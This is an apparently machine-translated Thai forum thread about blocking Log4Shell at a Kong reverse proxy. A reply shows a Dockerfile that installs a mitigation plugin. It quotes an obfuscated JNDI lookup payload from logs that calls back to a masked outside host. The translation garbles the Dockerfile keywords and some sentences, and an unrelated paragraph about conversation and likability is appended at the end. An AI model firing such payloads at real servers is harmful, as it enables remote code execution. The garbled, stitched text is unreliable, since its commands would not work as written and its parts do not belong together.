ฉันกำลังใช้ kong พร็อกซีย้อนกลับ เพื่อพร็อกซีทุกคำขอ HTTP สำหรับเว็บเซิร์ฟเวอร์ของฉัน ฉันต้องการลดปัญหา log4j ปัจจุบัน ("log4shell") โดยการค้นหาและแทนที่สตริงของผู้โจมตีที่สำคัญเช่น "jndi" ตัวอย่างเช่น ฉันพบสิ่งนี้ในบันทึกของฉัน:
${jndi:${lower:l}${lower:d}a${lower:p}://xxx.log4j.bin${upper:a}xxx.xx:80/callback}
ฉันคิดว่าสิ่งนี้สามารถทำได้โดยใช้ ขอปลั๊กอินหม้อแปลง. มีใครทำสิ่งนี้แล้วหรือยัง?
ป.ล. เพียงแค่แทนที่ เจนดี โดย พิการ กว้างไกลเกินไปและทำลายหลายสิ่งหลายอย่าง
พวกจากคองเองเพิ่งส่ง โพสต์บล็อก ที่ตอบคำถามของฉัน พวกเขาพัฒนาก ปลั๊กอิน kong ที่ลดการแสวงหาผลประโยชน์
ฉันเพิ่มปลั๊กอินนี้ใน kong ของฉันโดยเปลี่ยน Dockerfile ของฉัน:
จากคอง:2.6
...
รากผู้ใช้
...
# การลดขนาด log4shell
# ดู https://konghq.com/blog/log4j-log4shell/
RUN git clone https://github.com/brentos/kong-plugin-log4shell && \
cd kong-plugin-log4shell && \
luarocks ทำ
...
ENV KONG_PLUGINS ...,log4shell
...
USER คง
จากนั้นฉันเพิ่งเพิ่ม log4shell นี้เป็นปลั๊กอินส่วนกลาง
คนส่วนใหญ่ไม่เข้าใจว่าการถามคำถามมากมายจะปลดล็อกการเรียนรู้และปรับปรุงความสัมพันธ์ระหว่างบุคคล ตัวอย่างเช่น ในการศึกษาของ Alison แม้ว่าผู้คนจะจำได้อย่างแม่นยำว่ามีคำถามกี่ข้อที่ถูกถามในการสนทนา แต่พวกเขาไม่เข้าใจความเชื่อมโยงระหว่างคำถามและความชอบ จากการศึกษาทั้ง 4 เรื่องที่ผู้เข้าร่วมมีส่วนร่วมในการสนทนาด้วยตนเองหรืออ่านบันทึกการสนทนาของผู้อื่น ผู้คนมักไม่ตระหนักว่าการถามคำถามจะมีอิทธิพลหรือมีอิทธิพลต่อระดับมิตรภาพระหว่างผู้สนทนา
